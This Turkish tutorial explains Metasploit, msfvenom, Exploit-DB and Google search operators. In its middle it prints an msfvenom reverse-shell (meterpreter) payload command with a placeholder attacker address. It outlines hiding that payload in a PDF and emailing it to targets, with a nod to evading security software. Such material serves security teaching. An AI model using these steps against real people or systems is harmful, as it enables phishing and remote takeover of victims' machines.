Metasploit Framework’ler: Metasploit Framework, siber güvenlik alanında kullanılan popüler bir penetrasyon testi ve saldırı aracıdır. Rapid7 firması tarafından geliştirilmiştir ve açık kaynaklıdır. Metasploit, bilgisayar sistemlerindeki güvenlik açıklarını tespit etmek, değerlendirmek ve istismar etmek için kullanılır. Birçok farklı saldırı modülü içerir ve kullanıcıların bu modüller aracılığıyla çeşitli saldırıları gerçekleştirmesine olanak tanır. Metasploit Framework’ün bazı temel özellikleri şunlardır:
Modüler Yapı: Metasploit, modüler bir yapıya sahiptir ve birçok farklı saldırı modülünü içerir. Bu modüller, farklı güvenlik açıklarını hedefleyen saldırıları gerçekleştirmek için kullanılır.
Payload Oluşturma:Metasploit, çeşitli hedef sistemlerde çalışacak saldırı yüklerini (payload) oluşturmak için msfvenom gibi bir araç sağlar. Bu yükler, hedef sistemlere erişim sağlamak veya kontrol etmek için kullanılır.
Exploit Geliştirme ve Kullanma: Metasploit, birçok hazır exploit modülü içerir ve aynı zamanda kullanıcıların kendi exploitlerini geliştirmelerine olanak tanır. Bu exploitler, hedef sistemlerdeki güvenlik açıklarını istismar etmek için kullanılır.
Zafiyet Taraması: Metasploit, hedef sistemlerdeki güvenlik açıklarını otomatik olarak taramak için kullanılabilir. Bu sayede, sistem yöneticileri ve güvenlik uzmanları potansiyel zafiyetleri belirleyebilir ve gerekli önlemleri alabilirler.
Msfvenom:
Msfvenom, Metasploit Framework’ün bir parçası olan bir payload oluşturma aracıdır. Bu araç, hedef sistemlere gönderilecek saldırı yüklerini (payload) oluşturmak için kullanılır. Saldırı yükleri, hedef sistemlerdeki güvenlik açıklarını istismar etmek ve saldırganlara erişim veya kontrol sağlamak için kullanılır.msfvenom’un bazı temel özellikleri şunlardır:
Çeşitli Payload Seçenekleri: msfvenom, birçok farklı platform ve işletim sistemi için çeşitli payload seçenekleri sunar. Bu, farklı hedef sistemlerde çalışacak uygun saldırı yükleri oluşturmanıza olanak tanır.
Payload Özelleştirme: msfvenom, oluşturulan payload’ları özelleştirmek için çeşitli seçenekler sunar. Bu, payload’ların davranışını değiştirerek hedef sistemlere uygun saldırılar oluşturmanıza olanak tanır.
Payload Şifreleme ve Karıştırma: msfvenom, oluşturulan payload’ları şifrelemek ve karıştırmak için çeşitli teknikler sunar. Bu, payload’ların tespit edilmesini zorlaştırarak hedef sistemlere daha etkili bir şekilde saldırmanıza olanak tanır.
msfvenom ve Metasploit Framework, siber güvenlik uzmanları ve penetrasyon test uzmanları tarafından yaygın olarak kullanılan güçlü araçlardır. Bununla birlikte, bu araçların yasal ve etik sınırlar içinde kullanılması önemlidir. İzinsiz olarak sistemlere saldırmak yasa dışı olabilir ve ciddi sonuçlar doğurabilir.
Msfvenom’u kullanarak bir PDF dosyasına bir payload eklemek için adımları takip edebilirsiniz. Ancak, bu işlem yasal ve etik olarak sınırlar içinde gerçekleştirilmelidir. Ayrıca, bu işlemi gerçekleştirmeden önce izin alınması ve yasal bir ortamda kullanılması önemlidir. İşte bir örnek adım adım:
1. PDF Dosyası Oluşturma:
İlk olarak, bir PDF dosyası oluşturmalısınız. Boş bir PDF dosyası oluşturabilir veya var olan bir PDF dosyasını kullanabilirsiniz.
2. Payload Oluşturma:
Msfvenom’u kullanarak bir payload oluşturmanız gerekecek. Örneğin, bir ters kabuk (reverse shell) payload oluşturmak için şu komutu kullanabilirsiniz:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=your_ip_address LPORT=your_port -f exe > shellcode.exe 
Bu komut, Windows işletim sistemine sahip bir hedefe bir ters kabuk bağlantısı kuracak bir payload oluşturur. `your_ip_address` ve `your_port` yerine hedefinize ulaşmak için kullanacağınız IP adresi ve port numarasını belirtmelisiniz. Bu komut ayrıca oluşturulan payload’ı `shellcode.exe` adlı bir dosyaya kaydeder.
3. Payload’ı PDF Dosyasına Eklemek:
Oluşturulan payload’ı PDF dosyasına eklemek için çeşitli yöntemler vardır. Örneğin, bir PDF dosyasını açıklayıcı bir açıklama içeren bir link ekleyebilir ve bu link aracılığıyla payload’ı çalıştırabilirsiniz. Ya da, bir açıklama veya görüntü dosyası içinde payload’ı gizleyebilirsiniz.
4. PDF Dosyasını Yayınlama veya Dağıtma:
Son adım olarak, oluşturulan PDF dosyasını hedef sistemlere ulaştırmalısınız. Bu, dosyayı e-posta eki olarak göndermek, web sitesine yüklemek veya başka bir şekilde hedef kullanıcılara ulaşmak anlamına gelebilir.
Yukarıdaki adımları dikkatlice takip etmelisiniz. Ancak, tekrar hatırlatmak gerekirse, bu işlemi gerçekleştirmeden önce izin almalı ve yasal bir ortamda kullanmalısınız. Ayrıca, payload’ın güvenlik duvarları ve güvenlik yazılımları tarafından tespit edilip engellenmemesi için gelişmiş yöntemler gerekebilir.
Exploit-DB ve GHDB :
Exploit Database, bilgisayar güvenliği araştırmacılarının ve siber güvenlik uzmanlarının yazılım ve sistemlerdeki güvenlik açıklarını keşfetmelerine ve paylaşmalarına yardımcı olan bir platformdur. Bu platform, çeşitli yazılımlar, işletim sistemleri, uygulamalar ve cihazlardaki güvenlik açıklarını kataloglar ve bu açıkları içeren exploit kodlarını barındırır.
Exploit Database, birçok farklı açıdan faydalı bilgiler sunar:
1. Exploit Kodları: Exploit DB, çeşitli yazılım ve sistemlerdeki güvenlik açıklarını hedefleyen exploit kodlarını içerir. Bu exploitler, siber saldırganların veya güvenlik araştırmacılarının bu açıkları kullanarak sistemlere erişmesine veya kontrol etmesine olanak tanır.
2. Güvenlik Açıkları ve Zafiyetler: Exploit Database, belirli yazılım ve sistemlerdeki güvenlik açıkları ve zafiyetler hakkında bilgi sağlar. Bu bilgiler, sistem yöneticileri ve güvenlik uzmanları için potansiyel riskleri anlamalarına ve gidermelerine yardımcı olur.
3. Açıkların Detaylı Açıklamaları: Exploit DB, her bir güvenlik açığı için detaylı açıklamalar sunar. Bu açıklamalar, açığın nasıl çalıştığını, etkilenen sistemleri ve potansiyel etkilerini içerebilir.
4. Güncel ve Sürekli Güncellenen Veritabanı: Exploit Database, sürekli olarak güncellenen bir veritabanına sahiptir. Bu, kullanıcıların en yeni güvenlik açıkları hakkında bilgi almasını ve mevcut tehditlere karşı korunma önlemleri almasını sağlar.
Exploit Database, siber güvenlik topluluğu için önemli bir kaynak olup, hem saldırganların hem de savunucuların güvenlik konularında farkındalık kazanmalarına ve korunmalarına yardımcı olur.
site:example.com filetype:pdf
Bu Google Dork’u kullanarak “example.com” alan adına sahip bir web sitesindeki PDF dosyalarını bulabilirsiniz. Bu dork, belirli bir alan adına sahip web sitesinde bulunan PDF dosyalarını listeleyerek, bu dosyalar aracılığıyla potansiyel hassas bilgilere erişmenizi sağlar. Bu tür dork’lar, siber güvenlik uzmanları tarafından web sitelerindeki açık bilgilere erişmek için sıklıkla kullanılır.
Google Dork’larında sıkça kullanılan bazı terimlerin anlamları:
1. **intitle**: Bu terim, aranan kelimenin veya ifadenin web sayfalarının başlıklarında bulunmasını sağlar. Örneğin, “intitle:login” yazarak başlıkta “login” kelimesi geçen web sayfalarını bulabilirsiniz.
2. **intext**: Bu terim, aranan kelimenin veya ifadenin web sayfasının içeriğinde geçmesini sağlar. Örneğin, “intext:username” yazarak içeriğinde “username” kelimesi geçen web sayfalarını bulabilirsiniz.
3. **allintitle**: Bu terim, aranan tüm kelimelerin web sayfasının başlığında geçmesini sağlar. Örneğin, “allintitle:login page” yazarak başlığında hem “login” hem de “page” kelimeleri geçen web sayfalarını bulabilirsiniz.
4. **allintext**: Bu terim, aranan tüm kelimelerin web sayfasının içeriğinde geçmesini sağlar. Örneğin, “allintext:username password” yazarak içeriğinde hem “username” hem de “password” kelimeleri geçen web sayfalarını bulabilirsiniz.
5. **filetype**: Bu terim, belirli bir dosya türünü aramanızı sağlar. Örneğin, “filetype:pdf” yazarak sadece PDF dosyalarını içeren web sayfalarını bulabilirsiniz.
6. **site**: Bu terim, belirli bir alan adına sahip web sitelerini aramanızı sağlar. Örneğin, “site:example.com” yazarak sadece “example.com” alan adına sahip web sitelerini arayabilirsiniz.
7. **inurl**: Bu terim, aranan kelimenin veya ifadenin web sayfasının URL’sinde geçmesini sağlar. Örneğin, “inurl:login” yazarak URL’sinde “login” kelimesi geçen web sayfalarını bulabilirsiniz. Bu, özellikle belirli bir konuyu veya kategoriye odaklanmış web sayfalarını bulmak için kullanışlıdır.
8. **allinurl**: Bu terim, aranan tüm kelimelerin web sayfasının URL’sinde geçmesini sağlar. Örneğin, “allinurl:login page” yazarak URL’sinde hem “login” hem de “page” kelimeleri geçen web sayfalarını bulabilirsiniz. Bu terim, belirli bir konuyu veya kategoriye daha spesifik olarak odaklanmak için kullanılabilir ve arama sonuçlarını daraltabilir.
Bu terimleri diğer Google Dork terimleriyle birlikte kullanarak, istediğiniz özelliklere sahip web sayfalarını daha hassas bir şekilde bulabilirsiniz. Ancak, yine de bu tür aramaların yasal ve etik sınırlar içinde yapılması önemlidir.
Bu terimlerin kombinasyonlarıyla birlikte kullanarak, istediğiniz özelliklere sahip web sayfalarını daha doğru bir şekilde bulabilirsiniz. Ancak, bu tür aramaların yasal ve etik sınırlar içinde yapılması önemlidir.
Kaynakça: